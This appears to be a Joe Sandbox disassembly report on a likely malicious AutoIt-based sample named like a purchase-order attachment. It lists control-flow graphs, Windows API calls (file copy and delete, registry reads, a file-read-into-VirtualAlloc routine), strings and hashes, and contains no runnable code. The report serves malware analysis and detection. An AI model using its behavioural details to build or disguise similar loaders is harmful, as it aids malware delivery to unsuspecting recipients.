                        control_flow_graph 993 2fc890-2fc940 call 2e0650 call 2d010a call 2b4bce call 2fc6a0 call 2b41a7 call 2d2203 1006 2fc946-2fc94d call 2fce59 993->1006 1007 2fc9f3-2fc9fa call 2fce59 993->1007 1012 2fc9fc-2fc9fe 1006->1012 1013 2fc953-2fc9f1 call 2d297d call 2d1943 call 2d1914 call 2d297d call 2d1914 * 2 1006->1013 1007->1012 1014 2fca03 1007->1014 1015 2fcc53-2fcc54 1012->1015 1017 2fca06-2fcac2 call 2b417d * 8 call 2fd009 call 2d4129 1013->1017 1014->1017 1018 2fcc71-2fcc7f call 2b4fd2 1015->1018 1052 2fcacb-2fcae6 call 2fc6e4 1017->1052 1053 2fcac4-2fcac6 1017->1053 1056 2fcaec-2fcaf4 1052->1056 1057 2fcb78-2fcb84 call 2d4274 1052->1057 1053->1015 1058 2fcafc 1056->1058 1059 2fcaf6-2fcafa 1056->1059 1064 2fcb9a-2fcb9e 1057->1064 1065 2fcb86-2fcb95 DeleteFileW 1057->1065 1061 2fcb01-2fcb1f call 2b417d 1058->1061 1059->1061 1071 2fcb49-2fcb5f call 2fc07d call 2d373e 1061->1071 1072 2fcb21-2fcb27 1061->1072 1067 2fcc2e-2fcc42 CopyFileW 1064->1067 1068 2fcba4-2fcc1b call 2fd10c call 2fd134 call 2fc251 1064->1068 1065->1015 1069 2fcc56-2fcc6c DeleteFileW call 2fcfc8 1067->1069 1070 2fcc44-2fcc51 DeleteFileW 1067->1070 1068->1069 1089 2fcc1d-2fcc2c DeleteFileW 1068->1089 1069->1018 1070->1015 1084 2fcb64-2fcb6f 1071->1084 1075 2fcb29-2fcb3c call 2fc81a 1072->1075 1085 2fcb3e-2fcb47 1075->1085 1084->1056 1087 2fcb75 1084->1087 1085->1071 1087->1057 1089->1015
                        APIs
                          • Part of subcall function 002FC6A0: __time64.LIBCMT ref: 002FC6AA
                          • Part of subcall function 002B41A7: _fseek.LIBCMT ref: 002B41BF
                        • __wsplitpath.LIBCMT ref: 002FC96F
                          • Part of subcall function 002D297D: __wsplitpath_helper.LIBCMT ref: 002D29BD
                        • _wcscpy.LIBCMT ref: 002FC982
                        • _wcscat.LIBCMT ref: 002FC995
                        • __wsplitpath.LIBCMT ref: 002FC9BA
                        • _wcscat.LIBCMT ref: 002FC9D0
                        • _wcscat.LIBCMT ref: 002FC9E3
                          • Part of subcall function 002FC6E4: _memmove.LIBCMT ref: 002FC71D
                          • Part of subcall function 002FC6E4: _memmove.LIBCMT ref: 002FC72C
                        • _wcscmp.LIBCMT ref: 002FC92A
                          • Part of subcall function 002FCE59: _wcscmp.LIBCMT ref: 002FCF49
                          • Part of subcall function 002FCE59: _wcscmp.LIBCMT ref: 002FCF5C
                        • DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 002FCB8D
                        • DeleteFileW.KERNEL32(?,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 002FCC24
                        • CopyFileW.KERNEL32(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 002FCC3A
                        • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 002FCC4B
                        • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 002FCC5D
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: File$Delete$_wcscat_wcscmp$__wsplitpath_memmove$Copy__time64__wsplitpath_helper_fseek_wcscpy
                        • String ID:
                        • API String ID: 152968663-0
                        • Opcode ID: e87482f14c17decd2d2be382f61bb46cb02361972234ecb134ef2c5cf359beea
                        • Instruction ID: fb5fe299cbc8e94ffab40692d3af9792d1c51a45433f2007dd0058b12da7be1d
                        • Opcode Fuzzy Hash: e87482f14c17decd2d2be382f61bb46cb02361972234ecb134ef2c5cf359beea
                        • Instruction Fuzzy Hash: 6EC13AB1D1012DAACF11DFA5CD81EEEB7BDAF48350F1040AAF609E6251DB709A94CF61
                        Function 002B29C2 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 151windowtimeregistryCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 1090 2b29c2-2b29e2 1092 2b2a42-2b2a44 1090->1092 1093 2b29e4-2b29e7 1090->1093 1092->1093 1096 2b2a46 1092->1096 1094 2b29e9-2b29f0 1093->1094 1095 2b2a48 1093->1095 1097 2b2aac-2b2ab4 PostQuitMessage 1094->1097 1098 2b29f6-2b29fb 1094->1098 1100 322307-322335 call 2b322e call 2cec33 1095->1100 1101 2b2a4e-2b2a51 1095->1101 1099 2b2a2b-2b2a33 DefWindowProcW 1096->1099 1105 2b2a72-2b2a74 1097->1105 1103 2b2a01-2b2a03 1098->1103 1104 32238f-3223a3 call 2f57fb 1098->1104 1106 2b2a39-2b2a3f 1099->1106 1135 32233a-322341 1100->1135 1107 2b2a53-2b2a54 1101->1107 1108 2b2a76-2b2a9d SetTimer RegisterWindowMessageW 1101->1108 1110 2b2a09-2b2a0e 1103->1110 1111 2b2ab6-2b2ac5 call 2b1e58 1103->1111 1104->1105 1129 3223a9 1104->1129 1105->1106 1114 2b2a5a-2b2a6d KillTimer call 2b2b94 call 2b2ac7 1107->1114 1115 3222aa-3222ad 1107->1115 1108->1105 1112 2b2a9f-2b2aaa CreatePopupMenu 1108->1112 1118 322374-32237b 1110->1118 1119 2b2a14-2b2a19 1110->1119 1111->1105 1112->1105 1114->1105 1122 3222e3-322302 MoveWindow 1115->1122 1123 3222af-3222b1 1115->1123 1118->1099 1125 322381-32238a call 2eb31f 1118->1125 1127 2b2a1f-2b2a25 1119->1127 1128 32235f-32236f call 2f5fdb 1119->1128 1122->1105 1131 3222d2-3222de SetFocus 1123->1131 1132 3222b3-3222b6 1123->1132 1125->1099 1127->1099 1127->1135 1128->1105 1129->1099 1131->1105 1132->1127 1136 3222bc-3222cd call 2b322e 1132->1136 1135->1099 1140 322347-32235a call 2b2b94 call 2b3598 1135->1140 1136->1105 1140->1099
                        APIs
                        • DefWindowProcW.USER32(?,?,?,?), ref: 002B2A33
                        • KillTimer.USER32(?,00000001), ref: 002B2A5D
                        • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 002B2A80
                        • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 002B2A8B
                        • CreatePopupMenu.USER32 ref: 002B2A9F
                        • PostQuitMessage.USER32(00000000), ref: 002B2AAE
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                        • String ID: TaskbarCreated
                        • API String ID: 129472671-2362178303
                        • Opcode ID: 9adc56840d70c84e6bbf07f164de86c77aef8e8b529eb0a32c86b4710e7c764e
                        • Instruction ID: 4b54b11d093319c4ec2379ffed3bc3b0fa19fe89467ee84f4fe4f8dad2d4a132
                        • Opcode Fuzzy Hash: 9adc56840d70c84e6bbf07f164de86c77aef8e8b529eb0a32c86b4710e7c764e
                        • Instruction Fuzzy Hash: 8E413B32130346EBDB37AF68AC1ABFA365DF7143C0F544215FA16960A1DAB49CB88761
                        Function 002B30A5 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 66windowregistryCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        APIs
                        • GetSysColorBrush.USER32(0000000F), ref: 002B30B0
                        • LoadCursorW.USER32(00000000,00007F00), ref: 002B30BF
                        • LoadIconW.USER32(00000063), ref: 002B30D5
                        • LoadIconW.USER32(000000A4), ref: 002B30E7
                        • LoadIconW.USER32(000000A2), ref: 002B30F9
                          • Part of subcall function 002B318A: LoadImageW.USER32(002B0000,00000063,00000001,00000010,00000010,00000000), ref: 002B31AE
                        • RegisterClassExW.USER32(?), ref: 002B3167
                          • Part of subcall function 002B2F58: GetSysColorBrush.USER32(0000000F), ref: 002B2F8B
                          • Part of subcall function 002B2F58: RegisterClassExW.USER32(00000030), ref: 002B2FB5
                          • Part of subcall function 002B2F58: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 002B2FC6
                          • Part of subcall function 002B2F58: InitCommonControlsEx.COMCTL32(?), ref: 002B2FE3
                          • Part of subcall function 002B2F58: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 002B2FF3
                          • Part of subcall function 002B2F58: LoadIconW.USER32(000000A9), ref: 002B3009
                          • Part of subcall function 002B2F58: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 002B3018
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                        • String ID: #$0$AutoIt v3
                        • API String ID: 423443420-4155596026
                        • Opcode ID: c16d405097cab80a0394ca5739714f82bd4fe2de58bd515fd7b3c261091b808e
                        • Instruction ID: 1e93e76e52778cdbbd5a416e0dafa845857c3c9ffbe576c275e180951ec10e24
                        • Opcode Fuzzy Hash: c16d405097cab80a0394ca5739714f82bd4fe2de58bd515fd7b3c261091b808e
                        • Instruction Fuzzy Hash: 86216271D10304ABCB62DFADEC46A9ABFF9FB48314F10412AE20CA62A0D37445849F91
                        Function 002DBA66 Relevance: 15.2, APIs: 10, Instructions: 219COMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 1154 2dba66-2dba93 call 2d7750 call 2d8984 call 2d7616 1161 2dba95-2dbaab call 2df630 1154->1161 1162 2dbab0-2dbab5 1154->1162 1168 2dbd05-2dbd0a call 2d7795 1161->1168 1164 2dbabb-2dbac2 1162->1164 1166 2dbaf5-2dbb04 GetStartupInfoW 1164->1166 1167 2dbac4-2dbaf3 1164->1167 1169 2dbb0a-2dbb0f 1166->1169 1170 2dbc33-2dbc39 1166->1170 1167->1164 1169->1170 1174 2dbb15-2dbb2c 1169->1174 1171 2dbc3f-2dbc50 1170->1171 1172 2dbcf7-2dbd03 call 2dbd0b 1170->1172 1175 2dbc65-2dbc6b 1171->1175 1176 2dbc52-2dbc55 1171->1176 1172->1168 1179 2dbb2e-2dbb30 1174->1179 1180 2dbb33-2dbb36 1174->1180 1183 2dbc6d-2dbc70 1175->1183 1184 2dbc72-2dbc79 1175->1184 1176->1175 1182 2dbc57-2dbc60 1176->1182 1179->1180 1181 2dbb39-2dbb3f 1180->1181 1186 2dbb61-2dbb69 1181->1186 1187 2dbb41-2dbb52 call 2d7616 1181->1187 1188 2dbcf1-2dbcf2 1182->1188 1189 2dbc7c-2dbc88 GetStdHandle 1183->1189 1184->1189 1191 2dbb6c-2dbb6e 1186->1191 1198 2dbb58-2dbb5e 1187->1198 1199 2dbbe6-2dbbed 1187->1199 1188->1170 1192 2dbccf-2dbce5 1189->1192 1193 2dbc8a-2dbc8c 1189->1193 1191->1170 1196 2dbb74-2dbb79 1191->1196 1192->1188 1195 2dbce7-2dbcea 1192->1195 1193->1192 1197 2dbc8e-2dbc97 GetFileType 1193->1197 1195->1188 1200 2dbb7b-2dbb7e 1196->1200 1201 2dbbd3-2dbbe4 1196->1201 1197->1192 1202 2dbc99-2dbca3 1197->1202 1198->1186 1203 2dbbf3-2dbc01 1199->1203 1200->1201 1204 2dbb80-2dbb84 1200->1204 1201->1191 1205 2dbcad-2dbcb0 1202->1205 1206 2dbca5-2dbcab 1202->1206 1210 2dbc27-2dbc2e 1203->1210 1211 2dbc03-2dbc25 1203->1211 1204->1201 1212 2dbb86-2dbb88 1204->1212 1208 2dbcbb-2dbccd InitializeCriticalSectionAndSpinCount 1205->1208 1209 2dbcb2-2dbcb6 1205->1209 1207 2dbcb8 1206->1207 1207->1208 1208->1188 1209->1207 1210->1181 1211->1203 1213 2dbb98-2dbbcd InitializeCriticalSectionAndSpinCount 1212->1213 1214 2dbb8a-2dbb96 GetFileType 1212->1214 1215 2dbbd0 1213->1215 1214->1213 1214->1215 1215->1201
                        APIs
                        • __lock.LIBCMT ref: 002DBA74
                          • Part of subcall function 002D8984: __mtinitlocknum.LIBCMT ref: 002D8996
                          • Part of subcall function 002D8984: EnterCriticalSection.KERNEL32(002D0127,?,002D876D,0000000D), ref: 002D89AF
                        • __calloc_crt.LIBCMT ref: 002DBA85
                          • Part of subcall function 002D7616: __calloc_impl.LIBCMT ref: 002D7625
                          • Part of subcall function 002D7616: Sleep.KERNEL32(00000000,?,002D0127,?,002B125D,00000058,?,?), ref: 002D763C
                        • @_EH4_CallFilterFunc@8.LIBCMT ref: 002DBAA0
                        • GetStartupInfoW.KERNEL32(?,00366990,00000064,002D6B14,003667D8,00000014), ref: 002DBAF9
                        • __calloc_crt.LIBCMT ref: 002DBB44
                        • GetFileType.KERNEL32(00000001), ref: 002DBB8B
                        • InitializeCriticalSectionAndSpinCount.KERNEL32(0000000D,00000FA0), ref: 002DBBC4
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: CriticalSection__calloc_crt$CallCountEnterFileFilterFunc@8InfoInitializeSleepSpinStartupType__calloc_impl__lock__mtinitlocknum
                        • String ID:
                        • API String ID: 1426640281-0
                        • Opcode ID: bb5ef79605014593704fcacc8c358f5b7928d07a8b179a91c24a353e77357515
                        • Instruction ID: f5fccc8bbc003379a72bfdcf6dcbf015f133a91d478cc1a73c40466fe93dffc3
                        • Opcode Fuzzy Hash: bb5ef79605014593704fcacc8c358f5b7928d07a8b179a91c24a353e77357515
                        • Instruction Fuzzy Hash: D681D470924745CFCB26CF68C8906A9BBB4BF09324F25425FD4A6AB3E1D7349C52CB54
                        Function 03BC25E0 Relevance: 10.7, APIs: 7, Instructions: 239fileCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 1216 3bc25e0-3bc268e call 3bc0000 1219 3bc2695-3bc26bb call 3bc34f0 CreateFileW 1216->1219 1222 3bc26bd 1219->1222 1223 3bc26c2-3bc26d2 1219->1223 1224 3bc280d-3bc2811 1222->1224 1231 3bc26d9-3bc26f3 VirtualAlloc 1223->1231 1232 3bc26d4 1223->1232 1225 3bc2853-3bc2856 1224->1225 1226 3bc2813-3bc2817 1224->1226 1228 3bc2859-3bc2860 1225->1228 1229 3bc2819-3bc281c 1226->1229 1230 3bc2823-3bc2827 1226->1230 1233 3bc28b5-3bc28ca 1228->1233 1234 3bc2862-3bc286d 1228->1234 1229->1230 1235 3bc2829-3bc2833 1230->1235 1236 3bc2837-3bc283b 1230->1236 1237 3bc26fa-3bc2711 ReadFile 1231->1237 1238 3bc26f5 1231->1238 1232->1224 1241 3bc28cc-3bc28d7 VirtualFree 1233->1241 1242 3bc28da-3bc28e2 1233->1242 1239 3bc286f 1234->1239 1240 3bc2871-3bc287d 1234->1240 1235->1236 1243 3bc283d-3bc2847 1236->1243 1244 3bc284b 1236->1244 1245 3bc2718-3bc2758 VirtualAlloc 1237->1245 1246 3bc2713 1237->1246 1238->1224 1239->1233 1249 3bc287f-3bc288f 1240->1249 1250 3bc2891-3bc289d 1240->1250 1241->1242 1243->1244 1244->1225 1247 3bc275f-3bc277a call 3bc3740 1245->1247 1248 3bc275a 1245->1248 1246->1224 1256 3bc2785-3bc278f 1247->1256 1248->1224 1252 3bc28b3 1249->1252 1253 3bc289f-3bc28a8 1250->1253 1254 3bc28aa-3bc28b0 1250->1254 1252->1228 1253->1252 1254->1252 1257 3bc2791-3bc27c0 call 3bc3740 1256->1257 1258 3bc27c2-3bc27d6 call 3bc3550 1256->1258 1257->1256 1264 3bc27d8 1258->1264 1265 3bc27da-3bc27de 1258->1265 1264->1224 1266 3bc27ea-3bc27ee 1265->1266 1267 3bc27e0-3bc27e4 CloseHandle 1265->1267 1268 3bc27fe-3bc2807 1266->1268 1269 3bc27f0-3bc27fb VirtualFree 1266->1269 1267->1266 1268->1219 1268->1224 1269->1268
                        APIs
                        • CreateFileW.KERNEL32(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 03BC26B1
                        • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 03BC28D7
                        Memory Dump Source
                        • Source File: 00000000.00000002.1701910428.0000000003BC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 03BC0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_3bc0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: CreateFileFreeVirtual
                        • String ID:
                        • API String ID: 204039940-0
                        • Opcode ID: 014c9b5c74d83c0a726ef6016946af978a068631e2f3efa1e9065a42f07dad7c
                        • Instruction ID: 400303d94e19acfab0701eed64668776a8427b7727404c7575b2d2dadd15c6fe
                        • Opcode Fuzzy Hash: 014c9b5c74d83c0a726ef6016946af978a068631e2f3efa1e9065a42f07dad7c
                        • Instruction Fuzzy Hash: F0A10674E10249EBDF24CFA4C894BAEB7B5FF48308F2485ADE505AB280D7759A41CF94
                        Function 002CEB05 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 73registryCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 1325 2ceb05-2ceb2f call 2bc4cd RegOpenKeyExW 1328 324b17-324b2e RegQueryValueExW 1325->1328 1329 2ceb35-2ceb39 1325->1329 1330 324b30-324b6d call 2d010a call 2b4bce RegQueryValueExW 1328->1330 1331 324b91-324b9a RegCloseKey 1328->1331 1336 324b88-324b90 call 2b4fd2 1330->1336 1337 324b6f-324b86 call 2b7e53 1330->1337 1336->1331 1337->1336
                        APIs
                        • RegOpenKeyExW.KERNEL32(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,00000000,?,002CEADA,?,?), ref: 002CEB27
                        • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?,?,002CEADA,?,?), ref: 00324B26
                        • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000,?,?,002CEADA,?,?), ref: 00324B65
                        • RegCloseKey.ADVAPI32(?,?,002CEADA,?,?), ref: 00324B94
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: QueryValue$CloseOpen
                        • String ID: Include$Software\AutoIt v3\AutoIt
                        • API String ID: 1586453840-614718249
                        • Opcode ID: 0533e732e4308c889842966ebb60ce41a7a71941d4bb3cce0706824103b466dd
                        • Instruction ID: 95a721d06b9af3af11808e8bfb5942a0ad580e9048f1146b1124d66fd08cf404
                        • Opcode Fuzzy Hash: 0533e732e4308c889842966ebb60ce41a7a71941d4bb3cce0706824103b466dd
                        • Instruction Fuzzy Hash: 3D114C71A10118BEEB05ABA4DDC6EFE77BCEF04758F100059F506E61A1EAB0AE15DB60
                        Function 002B2E9D Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44COMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 1352 2b2e9d-2b2f0d CreateWindowExW * 2 ShowWindow * 2
                        APIs
                        • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 002B2ECB
                        • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 002B2EEC
                        • ShowWindow.USER32(00000000), ref: 002B2F00
                        • ShowWindow.USER32(00000000), ref: 002B2F09
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: Window$CreateShow
                        • String ID: AutoIt v3$edit
                        • API String ID: 1584632944-3779509399
                        • Opcode ID: 9455c7ccce81f0bb5041c7694e28bab0c61b244cdd7931b05870030317292d3d
                        • Instruction ID: 35aa321f271695b0ca97f1b01ca3ec8d4adc1b4ee93337da54c500b89c9595d9
                        • Opcode Fuzzy Hash: 9455c7ccce81f0bb5041c7694e28bab0c61b244cdd7931b05870030317292d3d
                        • Instruction Fuzzy Hash: A3F0DA72A402D07AE7326B6BAC4AE672E7DD7C6F20F01411EBA08A61A0C56518D5DAB1
                        Function 002B3DCB Relevance: 9.0, APIs: 2, Strings: 3, Instructions: 258COMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 002B3F9B: LoadLibraryExW.KERNEL32(00000001,00000000,00000002,?,?,?,?,002B34E2,?,00000001), ref: 002B3FCD
                        • _free.LIBCMT ref: 00323C27
                        • _free.LIBCMT ref: 00323C6E
                          • Part of subcall function 002BBDF0: GetCurrentDirectoryW.KERNEL32(00000104,?,?,00002000,?,003722E8,?,00000000,?,002B3E2E,?,00000000,?,0034DBF0,00000000,?), ref: 002BBE8B
                          • Part of subcall function 002BBDF0: GetFullPathNameW.KERNEL32(?,00000104,?,?,?,002B3E2E,?,00000000,?,0034DBF0,00000000,?,00000002), ref: 002BBEA7
                          • Part of subcall function 002BBDF0: __wsplitpath.LIBCMT ref: 002BBF19
                          • Part of subcall function 002BBDF0: _wcscpy.LIBCMT ref: 002BBF31
                          • Part of subcall function 002BBDF0: _wcscat.LIBCMT ref: 002BBF46
                          • Part of subcall function 002BBDF0: SetCurrentDirectoryW.KERNEL32(?), ref: 002BBF56
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: CurrentDirectory_free$FullLibraryLoadNamePath__wsplitpath_wcscat_wcscpy
                        • String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error$E<+
                        • API String ID: 1510338132-968007387
                        • Opcode ID: 31656495ec191938db4def49da2c091d34ad9d31958a639507857d9fe8edc8b4
                        • Instruction ID: 8b355995bab2bc13ad0aac9a248555ccbbeb99751187af34f386767fe09fa013
                        • Opcode Fuzzy Hash: 31656495ec191938db4def49da2c091d34ad9d31958a639507857d9fe8edc8b4
                        • Instruction Fuzzy Hash: A1917071920229AFCF05EFA4DC919EEB7B4BF09350F10442AF516AB291DB74AE15CF50
                        Function 03BC23B0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 144fileCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 03BC22A0: Sleep.KERNEL32(000001F4), ref: 03BC22B1
                        • CreateFileW.KERNEL32(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 03BC24D3
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1701910428.0000000003BC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 03BC0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_3bc0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: CreateFileSleep
                        • String ID: SF4JN33SUYW8
                        • API String ID: 2694422964-1055785038
                        • Opcode ID: 69e903d443ff7caa2e3ffb730fafdf8fe467f335fa286f863115a5aefbe24f07
                        • Instruction ID: ddb5bf3823ef574bd9d5cc5c1bfa13df2d36341db239c89f49ec3f5402197d3a
                        • Opcode Fuzzy Hash: 69e903d443ff7caa2e3ffb730fafdf8fe467f335fa286f863115a5aefbe24f07
                        • Instruction Fuzzy Hash: 49518334D14349DBEF24DBA4C855BEEB779AF48304F0045A9E208BB2C0D6B91B45CBA5
                        Function 002B38E4 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 84windowCOMMON
                        Download Yara Rule
                        APIs
                        • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 0032454E
                          • Part of subcall function 002B7E53: _memmove.LIBCMT ref: 002B7EB9
                        • _memset.LIBCMT ref: 002B3965
                        • _wcscpy.LIBCMT ref: 002B39B5
                        • Shell_NotifyIconW.SHELL32(00000001,?), ref: 002B39C6
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
